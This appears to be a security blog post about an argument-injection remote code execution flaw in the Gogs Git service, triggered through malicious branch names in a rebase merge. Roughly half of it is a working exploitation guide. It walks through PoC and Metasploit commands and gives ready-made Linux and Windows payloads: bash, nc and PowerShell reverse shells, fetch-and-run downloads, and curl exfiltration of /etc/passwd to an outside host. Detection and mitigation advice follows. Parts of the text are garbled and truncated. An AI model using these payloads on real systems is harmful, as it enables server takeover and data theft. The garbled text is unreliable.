Listen to this Post
Introduction:
A critical argument injection vulnerability (CWE-88) has been discovered in Gogs, a popular open-source self-hosted Git service, allowing any authenticated user to achieve remote code execution (RCE) on the server. The flaw stems from insufficient sanitization of branch names during the “Rebase before merging” operation, enabling attackers to inject the `–exec` flag into `git rebase` and execute arbitrary commands with the privileges of the Gogs server process.
Learning Objectives:
– Understand the mechanics of argument injection vulnerabilities in Git-based applications
– Learn how to identify and exploit the Gogs RCE flaw through a malicious branch name
– Implement effective mitigation strategies to protect Gogs instances and similar systems
You Should Know:
1. Deep Dive: The Gogs Argument Injection RCE
The vulnerability exists because the `Merge()` function in `internal/database/pull.go` passes the PR base branch name to `git rebase` without a `–` separator. A branch named `–exec=
StepβbyβStep Exploitation Guide (for authorized security testing only):
To test this vulnerability in a controlled environment, you can use the Python PoC from `portbuster1337/gogs-rce`:
Clone the PoC repository git clone https://github.com/portbuster1337/gogs-rce.git cd gogs-rce Install dependencies pip install requests Run pre-flight check to assess target python3 gogs.py http://target:3000 --preflight-only Exploit with auto-registration and command execution python3 gogs.py http://target:3000 --cmd "id > /tmp/pwned.txt" Exploit with existing credentials and reverse shell python3 gogs.py http://target:3000 -u attacker -p Password123 --listener 10.0.0.2:4444
The exploit automatically creates a repository, pushes a malicious branch named `–exec=sh${IFS}.payload`, opens a pull request, and triggers the merge with `merge_style=rebase_before_merging`.
2. Linux & Windows Command Injection Payloads
During a penetration test, you may need to craft various payloads to achieve different post-exploitation goals. Below are examples for Linux and Windows environments.
Linux payloads (run as the Gogs server process user):
Basic command execution
--exec=sh${IFS}-c${IFS}'id; whoami; hostname'
Reverse shell (bash)
--exec=sh${IFS}-c${IFS}'bash -i >& /dev/tcp/10.0.0.1/4444 0>&1'
Reverse shell (nc)
--exec=sh${IFS}-c${IFS}'nc -e /bin/sh 10.0.0.1 4444'
Download and execute script
--exec=sh${IFS}-c${IFS}'wget http://10.0.0.1/payload.sh -O /tmp/payload.sh && chmod +x /tmp/payload.sh && /tmp/payload.sh'
Data exfiltration
--exec=sh${IFS}-c${IFS}'curl -X POST -d "$(cat /etc/passwd)" http://10.0.0.1/exfil'
Windows payloads (if Gogs is running on Windows):
Basic command execution
--exec=powershell${IFS}-Command${IFS}"whoami"
Reverse shell (PowerShell)
--exec=powershell${IFS}-Command${IFS}"`$client = New-Object System.Net.Sockets.TCPClient('10.0.0.1',4444);`$stream = `$client.GetStream();[byte[]]`$bytes = 0..65535|%{0};while((`$i = `$stream.Read(`$bytes, 0, `$bytes.Length)) -1e 0){`$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$bytes,0,`$i);`$sendback = (iex `$data 2>&1 | Out-String );`$sendback2 = `$sendback + 'PS ' + (pwd).Path + '> ';`$sendbyte = ([text.encoding]::ASCII).GetBytes(`$sendback2);`$stream.Write(`$sendbyte,0,`$sendbyte.Length);`$stream.Flush()};`$client.Close()"
Download and execute
--exec=powershell${IFS}-Command${IFS}"Invoke-WebRequest -Uri http://10.0.0.1/payload.exe -OutFile C:\temp\payload.exe; Start-Process C:\temp\payload.exe"
The use of `${IFS}` (Internal Field Separator) is critical to bypass spaces in branch names, as raw spaces are not allowed.
3. Metasploit Module & Automation
Rapid7 has released a Metasploit module that automates the full exploit chain. To use it:
Start Metasploit msfconsole Load the Gogs RCE module (once integrated) use exploit/multi/http/gogs_rebase_rce Set options set RHOSTS target_ip set RPORT 3000 set USERNAME attacker set PASSWORD Password123 set PAYLOAD linux/x64/shell_reverse_tcp set LHOST your_ip set LPORT 4444 Exploit exploit
Additionally, the Python PoC supports various options for automation:
python3 gogs.py http://target:3000 --cookie "i_like_gogs=abc123..." --cmd "id" python3 gogs.py http://target:3000 -u myuser -pw mypassword --cmd "id"
4. Detection & Mitigation Strategies
Since no patch is available as of May 2026, detection and mitigation are critical. Use the following commands to check for compromise and implement workarounds.
Detection (Linux):
Search for suspicious git processes ps aux | grep "git rebase" | grep -E -- "--exec" Check for unauthorized pull requests in Gogs logs grep -i "pull request" /path/to/gogs/logs/gogs.log | grep -E "(branch|--exec)" Search for unusual cron jobs or reverse shells crontab -l | grep -E "(nc|bash|curl|wget)" ss -tulpn | grep -E "(4444|1337|31337)"
Mitigation Workarounds:
1. Disable open registration: Set `DISABLE_REGISTRATION = true` in `custom/conf/app.ini`
2. Restrict repository creation: Set `MAX_CREATION_LIMIT = 0` or a very low number
3. Disable the “Rebase before merging” option globally: Unfortunately, there is no global toggle, so each repository must be audited and manually disabled
4. Block the `–exec` pattern at the WAF or reverse proxy level: Use regex filtering on branch names in HTTP requests
WAF rule example (nginx):
if ($request_body ~ "--exec=") {
return 403;
}
5. Advanced Hardening & Cloud Considerations
For organizations running Gogs in cloud environments, additional hardening is necessary to limit blast radius.
Kubernetes (K8s) security context constraints:
apiVersion: v1 kind: Pod metadata: name: gogs spec: securityContext: runAsNonRoot: true runAsUser: 1000 readOnlyRootFilesystem: true containers: - name: gogs image: gogs/gogs securityContext: allowPrivilegeEscalation: false capabilities: drop: ["ALL"]
AWS Security Group restrictions:
– Block inbound port 3000 (default Gogs web UI) from untrusted IPs
– Use a bastion host or VPN for administrative access
– Enable AWS WAF with custom rules to block `–exec` patterns
API security best practices:
– Rotate all API tokens and SSH keys immediately if compromise is suspected
– Implement mandatory 2FA for all users
– Audit all repositories for unauthorized changes using `git log –oneline –since=”2 weeks ago”`
What Undercode Say:
– The Gogs RCE zero-day (CVSS 9.4) is a textbook example of CWE-88 argument injection, where unsanitized branch names are passed directly to `git rebase` without a `–` separator.
– With over 1,100 internet-facing instances (and many more internal), the attack surface is massive; default configurations with open registration and unlimited repos make exploitation trivial.
– The lack of a patch 72+ days after disclosure highlights the risks of relying on understaffed open-source projects; organizations must implement compensating controls immediately.
– Detection is challenging because the malicious branch name can be obfuscated (e.g., using `${IFS}`), but monitoring for `git rebase` processes with `–exec` flags can help.
– As a long-term solution, consider migrating to actively maintained alternatives like Gitea or GitLab, which have more robust security response teams.
Expected Output:
– Detection: Use `ps aux | grep “git rebase” | grep -E — “–exec”` to identify malicious rebase processes
– Mitigation: Disable open registration (`DISABLE_REGISTRATION = true`), restrict repo creation, and block `–exec` patterns at the WAF
Prediction:
– -1 The absence of a patch for over two months suggests that Gogs maintainers may lack the resources or urgency to address critical vulnerabilities, leading to increased exploitation in the wild.
– -1 Automated scanning for this flaw will likely become widespread within weeks, resulting in mass compromises of poorly configured instances, especially in academic and small-team environments.
– +1 The disclosure will drive adoption of more secure Git hosting alternatives and push organizations to implement stronger input validation and secure coding practices.
– -1 Supply chain attacks leveraging compromised Gogs instances could inject backdoors into widely used open-source projects, amplifying the impact far beyond direct server compromise.
βΆοΈ Related Video (84% Match):
π―Letβs Practice For Free:
π Live Courses & Certifications:
[Join Undercode Academy for Verified Certifications](https://undercode.co.uk/certifications/)
π Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[[email protected]](mailto:[email protected])
π Smart Architecture | π‘οΈ Secure by Design | β Trusted by Thousands
IT/Security Reporter URL:
Reported By: [Aleborges Cybersecurity](https://www.linkedin.com/posts/aleborges_cybersecurity-informationsecurity-exploitation-share-7465927009119105024-8eTh/) – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass β
πJOIN OUR CYBER WORLD [ CVE News β’ HackMonitor β’ UndercodeNews ]
[π¬ Whatsapp](https://undercode.help/whatsapp) | [π¬ Telegram](https://t.me/UndercodeCommunity)
π’ Follow UndercodeTesting & Stay Tuned:
[π formerly Twitter π¦](https://x.com/undercodeupdate) | [@ Threads](https://www.threads.net/@undercodetesting) | [π Linkedin](https://www.linkedin.com/company/undercodetesting/) | [π¦BlueSky](https://bsky.app/profile/undercode.bsky.social)
